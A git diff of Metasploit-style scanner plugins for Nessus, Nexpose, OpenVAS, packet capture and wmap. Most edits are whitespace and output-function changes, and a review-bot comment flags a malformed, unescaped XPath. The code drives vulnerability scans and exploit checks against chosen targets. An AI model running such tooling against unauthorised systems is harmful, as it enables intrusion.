def cmd_nessus_plugin_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_list")
@@ -957,14 +949,13 @@ module Msf
print_status("Returns a list of the plugins on the server per family.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Family Name',
'Total Plugins'
])
@@ -978,13 +969,13 @@ module Msf
tbl << [ '', '']
tbl << [ 'Total Plugins', plugins ]
print_good("Plugins By Family")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("List plugins for a family : nessus_plugin_family ")
end
-
+
def check_policy(*args)
-
+
case args.length
when 1
pid = args[0]
@@ -992,7 +983,7 @@ module Msf
print_error("No Policy ID supplied.")
return
end
-
+
pol = @n.policy_list_hash
pol.each {|p|
if p['id'].to_i == pid
@@ -1001,9 +992,9 @@ module Msf
}
return true
end
-
+
def cmd_nessus_scan_new(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_new ")
@@ -1013,11 +1004,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 3
pid = args[0].to_i
@@ -1029,23 +1020,23 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
-
+
if check_policy(pid)
print_error("That policy does not exist.")
return
end
-
+
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning #{tgts}")
-
+
scan = @n.scan_new(pid, name, tgts)
-
+
if scan
print_status("Scan started. uid is #{scan}")
end
end
-
+
def cmd_nessus_scan_pause(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause ")
@@ -1055,11 +1046,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
sid = args[0]
@@ -1069,14 +1060,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
-
+
pause = @n.scan_pause(sid)
-
+
print_status("#{sid} has been paused")
end
-
+
def cmd_nessus_scan_resume(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume ")
@@ -1086,11 +1077,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
sid = args[0]
@@ -1100,14 +1091,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
-
+
resume = @n.scan_resume(sid)
-
+
print_status("#{sid} has been resumed")
end
-
+
def cmd_nessus_report_hosts(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_hosts ")
@@ -1117,11 +1108,11 @@ module Msf
print_status("use nessus_report_list to list all available scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
rid = args[0]
@@ -1131,10 +1122,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Hostname',
'Severity',
'Sev 0',
@@ -1149,14 +1139,14 @@ module Msf
tbl << [ host['hostname'], host['severity'], host['sev0'], host['sev1'], host['sev2'], host['sev3'], host['current'], host['total'] ]
}
print_good("Report Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get information from a particular host: nessus_report_host_ports ")
end
-
+
def cmd_nessus_report_host_ports(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_ports ")
@@ -1165,11 +1155,11 @@ module Msf
print_status("Returns all the ports associated with a host and details about their vulnerabilities")
print_status("use nessus_report_hosts to list all available hosts for a report")
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 2
host = args[0]
@@ -1180,10 +1170,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Port',
'Protocol',
'Severity',
@@ -1198,14 +1187,14 @@ module Msf
tbl << [ port['portnum'], port['protocol'], port['severity'], port['svcname'], port['sev0'], port['sev1'], port['sev2'], port['sev3'] ]
}
print_good("Host Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail ")
end
-
+
def cmd_nessus_report_host_detail(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_detail ")
@@ -1215,11 +1204,11 @@ module Msf
print_status("use nessus_report_host_ports to list all available ports for a host")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 4
host = args[0]
@@ -1232,10 +1221,9 @@ module Msf
print_status(" use nessus_report_host_ports to list all available ports")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Port',
'Severity',
'PluginID',
@@ -1248,15 +1236,25 @@ module Msf
])
details=@n.report_host_port_details(rid, host, port, prot)
details.each {|detail|
- tbl << [ detail['port'], detail['severity'], detail['pluginID'], detail['pluginName'], detail['cvss_base_score'] || 'none', detail['exploit_available'] || '.', detail['cve'] || '.', detail['risk_factor'] || '.', detail['cvss_vector'] || '.' ]
+ tbl << [
+ detail['port'],
+ detail['severity'],
+ detail['pluginID'],
+ detail['pluginName'],
+ detail['cvss_base_score'] || 'none',
+ detail['exploit_available'] || '.',
+ detail['cve'] || '.',
+ detail['risk_factor'] || '.',
+ detail['cvss_vector'] || '.'
+ ]
}
print_good("Port Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_scan_pause_all(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause_all")
@@ -1266,18 +1264,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
pause = @n.scan_pause_all
-
+
print_status("All scans have been paused")
end
-
+
def cmd_nessus_scan_stop(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop ")
@@ -1287,11 +1285,11 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
sid = args[0]
@@ -1301,14 +1299,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
-
+
pause = @n.scan_stop(sid)
-
+
print_status("#{sid} has been stopped")
end
-
+
def cmd_nessus_scan_stop_all(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop_all")
@@ -1318,18 +1316,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
pause = @n.scan_stop_all
-
+
print_status("All scans have been stopped")
end
-
+
def cmd_nessus_scan_resume_all(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume_all")
@@ -1339,18 +1337,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
pause = @n.scan_resume_all
-
+
print_status("All scans have been resumed")
end
-
+
def cmd_nessus_user_add(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_add ")
@@ -1360,16 +1358,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 2
user = args[0]
@@ -1380,7 +1378,7 @@ module Msf
print_status(" Only adds non admin users")
return
end
-
+
u = @n.users_list
u.each { |stuff|
if stuff['name'] == user
@@ -1396,9 +1394,9 @@ module Msf
print_error("#{user} was not added")
end
end
-
+
def cmd_nessus_user_del(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_del ")
@@ -1408,16 +1406,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 1
user = args[0]
@@ -1427,7 +1425,7 @@ module Msf
print_status(" Only dels non admin users")
return
end
-
+
del = @n.user_del(user)
status = del.root.elements['status'].text
if status == "OK"
@@ -1436,9 +1434,9 @@ module Msf
print_error("#{user} was not deleted")
end
end
-
+
def cmd_nessus_user_passwd(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_passwd ")
@@ -1448,16 +1446,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 2
user = args[0]
@@ -1468,7 +1466,7 @@ module Msf
print_status(" User list from nessus_user_list")
return
end
-
+
pass = @n.user_pass(user,pass)
status = pass.root.elements['status'].text
if status == "OK"
@@ -1477,9 +1475,9 @@ module Msf
print_error("#{user}'s password has not been changed")
end
end
-
+
def cmd_nessus_admin(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_admin")
@@ -1489,20 +1487,20 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
else
print_good("Your Nessus user is an admin")
end
end
-
+
def cmd_nessus_plugin_family(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_family ")
@@ -1512,11 +1510,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
fam = args[0]
@@ -1526,27 +1524,26 @@ module Msf
print_status(" list all plugins from a Family from nessus_plugin_list")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Plugin ID',
'Plugin Name',
'Plugin File Name'
])
-
+
family = @n.plugin_family(fam)
-
+
family.each {|plugin|
tbl << [ plugin['id'], plugin['name'], plugin['filename'] ]
}
print_good("#{fam} Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_policy_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_list")
@@ -1555,14 +1552,13 @@ module Msf
print_status("Lists all policies on the server")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'ID',
'Name',
'Comments'
@@ -1572,12 +1568,12 @@ module Msf
tbl << [ policy['id'], policy['name'], policy['comments'] ]
}
print_good("Nessus Policy List")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_policy_del(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_del ")
@@ -1587,16 +1583,16 @@ module Msf
print_status("use nessus_policy_list to list all policies")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 1
pid = args[0]
@@ -1606,9 +1602,8 @@ module Msf
print_status(" nessus_policy_list to find the id.")
return
end
-
+
print_error("Are you sure you want to delete #{pid} ?")
- $stdout.flush
answer = gets
answer.chomp!
if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes"
@@ -1623,9 +1618,9 @@ module Msf
print_error("wow that was close, damn we asked")
end
end
-
+
def cmd_nessus_plugin_details(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_details ")
@@ -1635,11 +1630,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
pname = args[0]
@@ -1649,14 +1644,13 @@ module Msf
print_status(" nessus_plugin_list and then nessus_plugin_family to find the plugin file name.")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'',
''
])
-
+
entry = @n.plugin_detail(pname)
print_good("Plugin Details for #{entry['name']}")
tbl << [ "Plugin ID", entry['id'] ]
@@ -1673,12 +1667,12 @@ module Msf
tbl << [ "Solution", entry['solution'] ]
tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ]
tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ]
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_report_del(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_del ")
@@ -1688,16 +1682,16 @@ module Msf
print_status("use nessus_report_list to list all reports")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 1
rid = args[0]
@@ -1707,9 +1701,8 @@ module Msf
print_status(" nessus_report_list to find the id.")
return
end
-
+
print_error("Are you sure you want to delete #{rid} ?")
- $stdout.flush
answer = gets
answer.chomp!
if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes")
@@ -1723,12 +1716,12 @@ module Msf
else
print_error("wow that was close, damn we asked")
end
-
-
+
+
end
-
+
def cmd_nessus_server_prefs(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_prefs")
@@ -1737,19 +1730,18 @@ module Msf
print_status("Returns a long list of server prefs.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Name',
'Value'
])
@@ -1758,13 +1750,13 @@ module Msf
tbl << [ pref['name'], pref['value'] ]
}
print_good("Nessus Server Pref List")
- puts "\n"
- puts tbl.to_s + "\n"
-
+ print_good "\n"
+ print_good tbl.to_s + "\n"
+
end
-
+
def cmd_nessus_plugin_prefs(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_prefs")
@@ -1773,19 +1765,18 @@ module Msf
print_status("Returns a long list of plugin prefs.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Name',
'Value',
'Type'
@@ -1795,11 +1786,11 @@ module Msf
tbl << [ pref['prefname'], pref['prefvalues'], pref['preftype'] ]
}
print_good("Nessus Plugins Pref List")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
end
-
+
def initialize(framework, opts)
super
diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb
index ced99dc51a..d53d01740d 100644
--- a/plugins/nexpose.rb
+++ b/plugins/nexpose.rb
@@ -566,44 +566,44 @@ class Plugin::Nexpose < Msf::Plugin
end
end
- #
- # Nexpose vuln lookup
- #
- def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
- doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
-
- title = vulndef.attributes['title']
- pciSeverity = vulndef.attributes['pciSeverity']
- cvss_score = vulndef.attributes['cvssScore']
- cvss_vector = vulndef.attributes['cvssVector']
-
- vulndef.elements['references'].elements.each('reference') do |ref|
- if ref.attributes['source'] == 'BID'
- refs[ 'BID-' + ref.text ] = true
- elsif ref.attributes['source'] == 'CVE'
- # ref.text is CVE-$ID
- refs[ ref.text ] = true
- elsif ref.attributes['source'] == 'MS'
- refs[ 'MSB-MS-' + ref.text ] = true
- end
- end
-
- refs[ 'NEXPOSE-' + vid.downcase ] = true
-
- vuln = framework.db.find_or_create_vuln(
+ #
+ # Nexpose vuln lookup
+ #
+ def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
+ doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
+
+ title = vulndef.attributes['title']
+ pciSeverity = vulndef.attributes['pciSeverity']
+ cvss_score = vulndef.attributes['cvssScore']
+ cvss_vector = vulndef.attributes['cvssVector']
+
+ vulndef.elements['references'].elements.each('reference') do |ref|
+ if ref.attributes['source'] == 'BID'
+ refs[ 'BID-' + ref.text ] = true
+ elsif ref.attributes['source'] == 'CVE'
+ # ref.text is CVE-$ID
+ refs[ ref.text ] = true
+ elsif ref.attributes['source'] == 'MS'
+ refs[ 'MSB-MS-' + ref.text ] = true
+ end
+ end
+
+ refs[ 'NEXPOSE-' + vid.downcase ] = true
+
+ vuln = framework.db.find_or_create_vuln(
:host => host,
:service => serv,
:name => 'NEXPOSE-' + vid.downcase,
:data => title)
-
- rids = []
- refs.keys.each do |r|
- rids << framework.db.find_or_create_ref(:name => r)
- end
-
- vuln.refs << (rids - vuln.refs)
- end
- end
+
+ rids = []
+ refs.keys.each do |r|
+ rids << framework.db.find_or_create_ref(:name => r)
+ end
+
+ vuln.refs << (rids - vuln.refs)
+ end
+ end
end
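Review bot: The XPath predicate in the re-indented `nexpose_vuln_lookup` closes with `]]`, one bracket more than it opens (`vulnerability[@id = '#{vid}']]`); whether REXML rejects or silently tolerates the trailing bracket should be confirmed, and the expression should be `"/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']"`. Since `vid` is taken from the imported report and interpolated unescaped, a value containing `'` also breaks the predicate, so a short comment such as `# vid comes from the report XML; it is interpolated into the XPath verbatim` would help the next maintainer. The reference loop builds `'BID-' + ref.text`, which raises TypeError if a `<reference>` element is empty (`ref.text` nil); `ref.text.to_s` would keep the import going.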
diff --git a/plugins/openvas.rb b/plugins/openvas.rb
index f856006962..46722a58df 100644
--- a/plugins/openvas.rb
+++ b/plugins/openvas.rb
@@ -3,7 +3,10 @@
# This plugin provides integration with OpenVAS. Written by kost and
# averagesecurityguy.
#
-# Distributed under MIT license:
+# $Id$
+# $Revision$
+#
+# Distributed under MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
@@ -34,7 +37,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_task_pause' => "Pause task by ID",
'openvas_task_resume' => "Resume task by ID",
'openvas_task_resume_or_start' => "Resume task or start task by ID",
-
+
'openvas_target_create' => "Create target (name, hosts, comment)",
'openvas_target_delete' => "Delete target by ID",
'openvas_target_list' => "Display list of targets",
@@ -43,7 +46,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_format_list' => "Display list of available report formats",
- 'openvas_report_list' => "Display a list of available report formats",
+ 'openvas_report_list' => "Display a list of available report formats",
'openvas_report_delete' => "Delete a report specified by ID",
'openvas_report_download' => "Save a report to disk",
'openvas_report_import' => "Import report specified by ID into framework",
@@ -172,7 +175,7 @@ class Plugin::OpenVAS < Msf::Plugin
# Make sure the correct number of arguments are present.
if args?(args, 4, 5)
-
+
user, pass, host, port, sslv = args
# SSL warning. User is required to confirm.
@@ -199,10 +202,10 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage:")
- print_status("openvas_connect username password host port ")
+ print_status("openvas_connect username password host port ")
end
end
-
+
# Disconnect from an OpenVAS manager
def cmd_openvas_disconnect()
return unless openvas?
@@ -216,7 +219,7 @@ class Plugin::OpenVAS < Msf::Plugin
#--------------------------
def cmd_openvas_target_create(*args)
return unless openvas?
-
+
if args?(args, 3)
begin
resp = @ov.target_create(args[0], args[1], args[2])
@@ -255,13 +258,14 @@ class Plugin::OpenVAS < Msf::Plugin
'Columns' => ["ID", "Name", "Hosts", "Max Hosts", "In Use", "Comment"])
id = 0
@ov.target_get_all().each do |target|
- tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
- target["in_use"], target["comment"] ]
+ tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
+ target["in_use"], target["comment"] ]
id += 1
end
print_good("OpenVAS list of targets")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -324,8 +328,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of tasks")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -415,15 +420,16 @@ class Plugin::OpenVAS < Msf::Plugin
begin
tbl = Rex::Ui::Text::Table.new(
'Columns' => [ "ID", "Name" ])
-
+
id = 0
@ov.configs.each do |config|
tbl << [ id, config["name"] ]
id += 1
end
print_good("OpenVAS list of configs")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -444,8 +450,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of report formats")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -466,8 +473,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of reports")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -508,7 +516,7 @@ class Plugin::OpenVAS < Msf::Plugin
print_status("Usage: openvas_report_download ")
end
end
-
+
def cmd_openvas_report_import(*args)
return unless openvas?
@@ -523,7 +531,7 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage: openvas_report_import ")
print_status("Only the NBE format is supported for importing.")
- end
+ end
end
end # End OpenVAS class
diff --git a/plugins/pcap_log.rb b/plugins/pcap_log.rb
index 496e75abad..c7bf8e368e 100644
--- a/plugins/pcap_log.rb
+++ b/plugins/pcap_log.rb
@@ -37,7 +37,7 @@ class Plugin::PcapLog < Msf::Plugin
"pcap_iface" => "Set/Get an interface to capture from",
"pcap_start" => "Start a capture",
"pcap_stop" => "Stop a running capture",
-
+
"pcap_show_config" => "Show the current PcapLog configuration"
}
end
@@ -59,7 +59,7 @@ class Plugin::PcapLog < Msf::Plugin
def cmd_pcap_iface(*args)
@iface = args[0] || @iface
- print_line "#{self.name} Interface: #{@iface}"
+ print_line "#{self.name} Interface: #{@iface}"
end
def cmd_pcap_start(*args)
@@ -94,7 +94,7 @@ class Plugin::PcapLog < Msf::Plugin
print_line "Capture Stats: #{@pcap.stats.inspect}"
@pcap = nil
@capture_file.close if @capture_file.respond_to? :close
- @capture_thread.kill
+ @capture_thread.kill
@capture_thread = nil
else
print_error "No capture running."
@@ -124,7 +124,7 @@ class Plugin::PcapLog < Msf::Plugin
return [false, msg]
end
- # Check directory suitability.
+ # Check directory suitability.
unless File.directory? @dir
msg = "Invalid pcap directory specified: '#{@dir}'"
return [false, msg]
@@ -170,7 +170,7 @@ class Plugin::PcapLog < Msf::Plugin
end
end
-
+
def initialize(framework, opts)
super
add_console_dispatcher(PcapLogDispatcher)
diff --git a/plugins/wmap.rb b/plugins/wmap.rb
index 12b4a1f796..010e2140f7 100644
--- a/plugins/wmap.rb
+++ b/plugins/wmap.rb
@@ -12,9 +12,9 @@ module Msf
class Plugin::Wmap < Msf::Plugin
class WmapCommandDispatcher
-
+
attr_accessor :targets
-
+
include Msf::Ui::Console::CommandDispatcher
def name
@@ -37,12 +37,12 @@ class Plugin::Wmap < Msf::Plugin
while (arg = args.shift)
case arg
- when '-c'
- self.targets = {}
+ when '-c'
+ self.targets = {}
when '-l'
view_targets
return
- when '-t'
+ when '-t'
process_urls(args.shift)
when '-h'
print_status("Usage: wmap_targets [options]")
@@ -50,7 +50,7 @@ class Plugin::Wmap < Msf::Plugin
print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ")
print_line("\t-c Clean target sites list")
print_line("\t-l List all target sites")
-
+
print_line("")
return
else
@@ -59,7 +59,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
def cmd_wmap_sites(*args)
args.push("-h") if args.length == 0
@@ -68,10 +68,10 @@ class Plugin::Wmap < Msf::Plugin
when '-a'
s = add_web_site(args.shift)
if s
- print_status("Site created.")
+ print_status("Site created.")
else
print_error("Unable to create site")
- end
+ end
when '-l'
view_sites
return
@@ -79,7 +79,7 @@ class Plugin::Wmap < Msf::Plugin
u = args.shift
l = args.shift
s = args.shift
-
+
if l == nil or l.empty?
l = 200
s = true
@@ -87,16 +87,16 @@ class Plugin::Wmap < Msf::Plugin
l = l.to_i
s = false
end
-
+
view_site_tree(u,l,s)
- return
+ return
when '-h'
print_status("Usage: wmap_sites [options]")
print_line("\t-h Display this help text")
print_line("\t-a [url] Add site (vhost,url)")
print_line("\t-l List all available sites")
print_line("\t-s [urls] (level) Display site structure (vhost,url)")
-
+
print_line("")
return
else
@@ -105,7 +105,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
def cmd_wmap_run(*args)
# Run exploit check
wmap_check = true
@@ -113,7 +113,7 @@ class Plugin::Wmap < Msf::Plugin
wmap_runexpl = false
# Exit wmap if session is created
wmap_exitifsess = true
-
+
# Formating
sizeline = 60
@@ -122,38 +122,38 @@ class Plugin::Wmap < Msf::Plugin
# Exclude files can be modified by setting datastore['WMAP_EXCLUDE']
wmap_exclude_files = '.*\.(gif|jpg|png*)$'
-
+
run_wmap_ssl = true
run_wmap_server = true
run_wmap_dir_file = true
run_wmap_query = true
run_wmap_unique_query = true
run_wmap_generic = true
-
+
# If module supports datastore['VERBOSE']
moduleverbose = false
-
+
showprogress = false
-
+
if not run_wmap_ssl
print_status("Loading of wmap ssl modules disabled.")
end
if not run_wmap_server
print_status("Loading of wmap server modules disabled.")
- end
- if not run_wmap_dir_file
+ end
+ if not run_wmap_dir_file
print_status("Loading of wmap dir and file modules disabled.")
end
if not run_wmap_query
print_status("Loading of wmap query modules disabled.")
- end
- if not run_wmap_unique_query
+ end
+ if not run_wmap_unique_query
print_status("Loading of wmap unique query modules disabled.")
- end
- if not run_wmap_generic
+ end
+ if not run_wmap_generic
print_status("Loading of wmap generic modules disabled.")
- end
-
+ end
+
stamp = Time.now.to_f
mode = 0
@@ -203,7 +203,7 @@ class Plugin::Wmap < Msf::Plugin
print_status("Using module #{mname}.")
end
using_m = true
-
+
when '-h'
print_status("Usage: wmap_run [options]")
print_line("\t-h Display this help text")
@@ -220,30 +220,30 @@ class Plugin::Wmap < Msf::Plugin
print_error("Targets have not been selected.")
return
end
-
- if self.targets.keys.length == 0
+
+ if self.targets.keys.length == 0
print_error("Targets have not been selected.")
return
end
-
+
self.targets.each_with_index do |t, idx|
selected_host = t[1][:host]
selected_port = t[1][:port]
selected_ssl = t[1][:ssl]
selected_vhost = t[1][:vhost]
-
+
print_status ("Testing target:")
print_status ("\tSite: #{selected_vhost} (#{selected_host})")
print_status ("\tPort: #{selected_port} SSL: #{selected_ssl}")
- puts '='* sizeline
+ print_status '='* sizeline
print_status("Testing started. #{(Time.now )}")
-
-
+
+
if not selected_ssl
run_wmap_ssl = false
#print_status ("Target is not SSL. SSL modules disabled.")
end
-
+
# WMAP_DIR, WMAP_FILE
matches = {}
@@ -252,7 +252,7 @@ class Plugin::Wmap < Msf::Plugin
# WMAP_QUERY
matches2 = {}
-
+
# WMAP_SSL
matches3 = {}
@@ -279,7 +279,7 @@ class Plugin::Wmap < Msf::Plugin
if penabled
#if ( not using_p or eprofile.include? n.split('/').last ) or (using_m and n.match(mname))
- if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
+ if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
#
# First run the WMAP_SERVER plugins
#
@@ -307,7 +307,7 @@ class Plugin::Wmap < Msf::Plugin
when :WMAP_SSL
if run_wmap_ssl
matches3[[selected_host,selected_port,selected_ssl,selected_vhost,mtype[1]+'/'+n]]=true
- end
+ end
else
# Black Hole
end
@@ -321,14 +321,14 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server.
# :WMAP_SSL
#
-
- puts "\n=[ SSL testing ]="
- puts "=" * sizeline
-
+
+ print_status "\n=[ SSL testing ]="
+ print_status "=" * sizeline
+
if not selected_ssl
print_status ("Target is not SSL. SSL modules disabled.")
end
-
+
idx = 0
matches3.each_key do |xref|
idx += 1
@@ -377,7 +377,7 @@ class Plugin::Wmap < Msf::Plugin
mod.datastore['VHOST'] = xref[3].to_s
mod.datastore['VERBOSE'] = moduleverbose
mod.datastore['ShowProgress'] = showprogress
-
+
#
# Run the plugins that only need to be
# launched once.
@@ -386,7 +386,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SSL
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -490,14 +490,14 @@ class Plugin::Wmap < Msf::Plugin
end
end
-
+
#
# Handle modules that need to be run before all tests, once usually again the web server.
# :WMAP_SERVER
#
- puts "\n=[ Web Server testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ Web Server testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches1.each_key do |xref|
idx += 1
@@ -555,7 +555,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SERVER
